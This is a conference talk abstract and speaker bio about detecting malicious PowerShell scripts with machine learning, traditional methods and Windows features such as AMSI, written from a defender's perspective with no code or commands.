Detecting Advanced Powershell Threats (APTs) with Machine Learning

Georgelin Manuel , Software Developer , K7 Computing

Advanced threat actors leverage the power and flexibility of Powershell scripts to launch sophisticated attacks on their targets while managing to fly under the radar. These silent Powershell scripts can be used in the initial phase of the attack as downloaders or to move laterally on a network post-compromise. As Powershell scripts are supported on all modern Windows machines by default, they are an indispensable tool for a persistent attacker.

Security vendors have been relatively slow in responding to this modern threat because Powershell scripts present unique challenges and introduce unusual attack vectors. They can be fileless, running directly from memory, and can be easily embedded in weaponized documents. Like in most other scripting languages, scripts in Powershell can easily be encoded and obfuscated, thus helping malicious Powershell scripts to bypass detection engines. Process-based behavioural HIPS is also difficult since these scripts are interpreted by OS executables than cannot be blocked.

Among general consumers, legitimate use of Powershell scripts is typically limited to applications, and to a few tech-savvy users. However, in an enterprise environment, use of Powershell scripts for system administration has gained traction over the years. Therefore, a defensive approach of blocking all Powershell scripts by default is not a viable option. Restricted usage of Powershell scripts based on authoritative signing does provide some level of protection in certain environments, but in a post-compromised environment, most bets are off.

This presentation describes methods to protect against malicious powershell scripts using a combination of machine learning and ‘traditional’ methods. We will be covering the pros and cons of the various methods, along with on our research and analysis results. We will also explore the efficacy of relatively new additions to the Windows security ecosystem such like Antimalware Scan Interface (AMSI) and more detailed event logs in the context of Powershell scripts.

Georgelin Manuel

Georgelin Manuel graduated from Cochin University of Science and Technology with a Master’s degree in Computer and Information Science. Since his inception at K7 Computing, he has been involved in enhancing product features and researching data mining techniques, using machine learning algorithms on various file formats, focusing primarily on Win32 Portable Executables. His interests are data mining and machine learning.